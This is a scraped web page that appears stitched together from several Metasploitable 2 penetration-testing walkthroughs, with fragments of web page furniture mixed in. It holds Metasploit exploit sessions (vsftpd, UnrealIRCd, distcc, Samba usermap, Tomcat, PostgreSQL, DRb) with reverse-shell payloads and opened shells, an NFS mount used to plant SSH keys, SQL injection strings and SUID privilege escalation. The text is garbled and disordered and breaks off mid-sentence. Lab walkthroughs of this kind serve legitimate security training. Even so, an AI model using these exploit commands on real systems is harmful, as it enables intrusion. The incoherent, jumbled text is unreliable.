metasploitable 2 list of vulnerabilities

metasploitable 2 list of vulnerabilities

msf exploit(distcc_exec) > set LHOST 192.168.127.159 Under the Module Options section of the above exploit there were the following commands to run: Note: The show targets & set TARGET steps are not necessary as 0 is the default. Execute Metasploit framework by typing msfconsole on the Kali prompt: Search all . Getting started The nmap command uses a few flags to conduct the initial scan. -- ---- In Metasploitable that can be done in two ways, first, you can quickly run the ifconfig command in the terminal and find the IP address of the machine or you can run a Nmap scan in Kali. To access a particular web application, click on one of the links provided. payload => java/meterpreter/reverse_tcp Relist the files & folders in time descending order showing the newly created file. Loading of any arbitrary web page on the Interet or locally including the sites password files.Phishing, SQL injection to dump all usernames and passwords via the username field or the password fieldXSS via any of the displayed fields. :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead We can now look into the databases and get whatever data we may like. LHOST yes The listen address -- ---- For this walk-though I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. Name Current Setting Required Description In our testing environment, the IP of the attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154. [*] Writing to socket A We performed a Nessus scan against the target, and a critical vulnerability on this port ispresent: rsh Unauthenticated Access (via finger Information). Step 5: Select your Virtual Machine and click the Setting button. To access official Ubuntu documentation, please visit: Lets proceed with our exploitation. Nessus is a well-known and popular vulnerability scanner that is free for personal, non-commercial use that was first released in 1998 by Renaurd Deraison and currently published by Tenable Network Security.There is also a spin-off project of Nessus 2, named OpenVAS, that is published under the GPL.Using a large number of vulnerability checks, called plugins in Nessus, you can . msf exploit(vsftpd_234_backdoor) > show options Start/Stop Stop: Open services.msc. [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:35889) at 2021-02-06 16:51:56 +0300 msf exploit(tomcat_mgr_deploy) > exploit This document outlines many of the security flaws in the Metasploitable 2 image. root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. In this lab we learned how to perform reconnaissance on a target to discover potential system vulnerabilities. msf > use exploit/multi/misc/java_rmi_server Alternatively, you can also use VMWare Workstation or VMWare Server. Have you used Metasploitable to practice Penetration Testing? [*] Command: echo D0Yvs2n6TnTUDmPF; Stop the Apache Tomcat 8.0 Tomcat8 service. Then start your Metasploit 2 VM, it should boot now. Name Current Setting Required Description msf2 has an rsh-server running and allowing remote connectivity through port 513. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 Upon a hit, Youre going to see something like: After you find the key, you can use this to log in via ssh: as root. Name Current Setting Required Description ---- --------------- -------- ----------- Eventually an exploit . SMBDomain WORKGROUP no The Windows domain to use for authentication The login for Metasploitable 2 is msfadmin:msfadmin. About Press Copyright Contact us Creators Advertise Developers Terms Privacy Policy & Safety How YouTube works Test new features NFL Sunday Ticket Press Copyright . It is also possible to abuse the manager application using /manager/html/upload, but this approach is not incorporated in this module. The VictimsVirtual Machine has been established, but at this stage, some sets are required to launch the machine. In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. 15. PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) [*] Trying to mount writeable share 'tmp' [*] Trying to link 'rootfs' to the root filesystem [*] Now access the following share to browse the root filesystem: msf auxiliary(samba_symlink_traversal) > exit, root@ubuntu:~# smbclient //192.168.99.131/tmp, getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec). Module options (exploit/unix/ftp/vsftpd_234_backdoor): RHOSTS yes The target address range or CIDR identifier Lets first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. Set the SUID bit using the following command: chmod 4755 rootme. Every CVE Record added to the list is assigned and published by a CNA. msf exploit(usermap_script) > set LHOST 192.168.127.159 [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2021-02-06 23:03:13 +0300 Name Current Setting Required Description msf exploit(usermap_script) > set RPORT 445 [*] USER: 331 Please specify the password. Here is a brief outline of the environment being used: First we need to list what services are visible on the target: This shows that NFS (Network File System) uses port 2049 so next lets determine what shares are being exported: The showmount command tells us that the root / of the file system is being shared. On Metasploitable 2, there are many other vulnerabilities open to exploit. Id Name Lets move on. High-end tools like Metasploit and Nmap can be used to test this application by security enthusiasts. VM version = Metasploitable 2, Ubuntu 64-bit Kernel release = 2.6.24-16-server IP address = 10.0.2.4 Login = msfadmin/msfadmin NFS Service vulnerability First we need to list what services are visible on the target: Performing a port scan to discover the available services using the Network Mapper 'nmap'. Id Name Id Name Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. ---- --------------- -------- ----------- To have over a dozen vulnerabilities at the level of high on severity means you are on an . Browsing to http://192.168.56.101/ shows the web application home page. [*] Reading from socket B I employ the following penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and exploitation. Server version: 5.0.51a-3ubuntu5 (Ubuntu). Metasploit is a free open-source tool for developing and executing exploit code. Id Name Module options (exploit/multi/http/tomcat_mgr_deploy): Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather out dated OWASP Top 10. NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. THREADS 1 yes The number of concurrent threads Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1, inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0, inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link, UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1, root@ubuntu:~# nmap -p0-65535 192.168.99.131, Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT, Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686, root@ubuntu:~# showmount -e 192.168.99.131. Using the UPDATE pg_largeobject binary injection method, this module compiles a Linux shared object file, uploads it to your target host, and generates a UDF (user-defined function) by that shared object. VHOST no HTTP server virtual host Step 2: Vulnerability Assessment. Open in app. Metasploitable 2 is designed to be vulnerable in order to work as a sandbox to learn security. This could allow more attacks against the database to be launched by an attacker. Module options (exploit/linux/misc/drb_remote_codeexec): Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. Module options (auxiliary/scanner/smb/smb_version): Pass the udevd netlink socket PID (listed in /proc/net/netlink, typically is the udevd PID minus 1) as argv[1]. msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 SESSION => 1 [*] Banner: 220 (vsFTPd 2.3.4) In the current version as of this writing, the applications are. Reference: Nmap command-line examples After the virtual machine boots, login to console with username msfadmin and password msfadmin. Metasploitable 2 has deliberately vulnerable web applications pre-installed. RHOST 192.168.127.154 yes The target address It is also instrumental in Intrusion Detection System signature development. Once Metasploitable 2 is up and running and you have the IP address (mine will be 10.0.0.22 for this walkthrough), then you want to start your scan. [*] Accepted the second client connection Description: In this video I will show you how to exploit remote vulnerabilities on Metasploitable -2 . [*] Using URL: msf > use exploit/unix/misc/distcc_exec What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. All rights reserved. A Computer Science portal for geeks. In this example, Metasploitable 2 is running at IP 192.168.56.101. [*] Accepted the second client connection There are the following kinds of vulnerabilities in Metasploitable 2- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. First of all, open the Metasploit console in Kali. PASSWORD no A specific password to authenticate with Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by. RHOST 192.168.127.154 yes The target address One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". Id Name Step 6: Display Database Name. Therefore, well stop here. Information about each OWASP vulnerability can be found under the menu on the left: For our first example we have Toggled Hints to 1 and selected the A1- Injection -> SQLi Bypass Authentication -> Login vulnerability: Trying the SSL Injection method of entering OR 1=1 into the Name field, as described in the hints, gave the following errors: This turns out to be due to a minor, yet crucial, configuration problem that impacts any database related functionality. msf exploit(tomcat_mgr_deploy) > set RPORT 8180 Lets go ahead. All right, there are a lot of services just awaitingour consideration. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed. [*] Matching TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation). Then we looked for an exploit in Metasploit, and fortunately, we got one: Distributed Ruby Send instance_eval/syscall Code Execution. (Note: See a list with command ls /var/www.) The VNC service provides remote desktop access using the password password. Both operating systems were a Virtual Machine (VM) running under VirtualBox. Were not going to go into the web applications here because, in this article, were focused on host-based exploitation. Name Current Setting Required Description Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Your identification has been saved in /root/.ssh/id_rsa. Welcome to the MySQL monitor. nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks The root directory is shared. RHOSTS yes The target address range or CIDR identifier LHOST => 192.168.127.159 msf auxiliary(postgres_login) > show options For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. msf exploit(postgres_payload) > set LHOST 192.168.127.159 RPORT 23 yes The target port Just enter ifconfig at the prompt to see the details for the virtual machine. Armitage is very user friendly. Exploit target: Set-up This . RPORT 8180 yes The target port msf exploit(distcc_exec) > show options [*] 192.168.127.154:5432 Postgres - Disconnected Time for some escalation of local privilege. RHOST yes The target address Mitigation: Update . A demonstration of an adverse outcome. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. The compressed file is about 800 MB and can take a while to download over a slow connection. Id Name In this article we continue to demonstrate discovering & exploiting some of the intentional vulnerabilities within a Metasploitable penetration testing target. msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787 [*] A is input Target the IP address you found previously, and scan all ports (0-65535). This setup included an attacker using Kali Linux and a target using the Linux-based Metasploitable. The purpose of a Command Injection attack is to execute unwanted commands on the target system. daemon, whereis nc msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse Exploit target: First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search